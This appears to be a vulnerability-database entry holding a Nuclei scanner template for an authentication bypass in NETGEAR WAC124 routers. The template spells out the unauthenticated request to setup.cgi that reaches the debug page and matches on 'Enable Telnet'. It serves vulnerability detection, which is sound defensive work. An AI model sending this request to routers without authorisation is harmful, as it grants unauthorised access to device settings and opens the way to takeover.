NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
PoC代码[已公开]
id: netgear-wac124-router-auth-bypass
info:
name: NETGEAR WAC124 - Authentication Bypass
author: gy741
severity: high
description: |
NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
- https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cwe-id: CWE-287
metadata:
max-request: 1
tags: netgear,auth-bypass,router,iot,vuln
http:
- method: GET
path:
- "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Enable Telnet"
# digest: 490a0046304402203d87f4a26b8d0c54dacdcd1773603c68ce1b3d20068bd1e6fe736115ef6dfb8102203150c33a3cefd718ba078443ff9325aad61077189375149b883e31e724344634:922c64590222798bb761d5b6d8e72950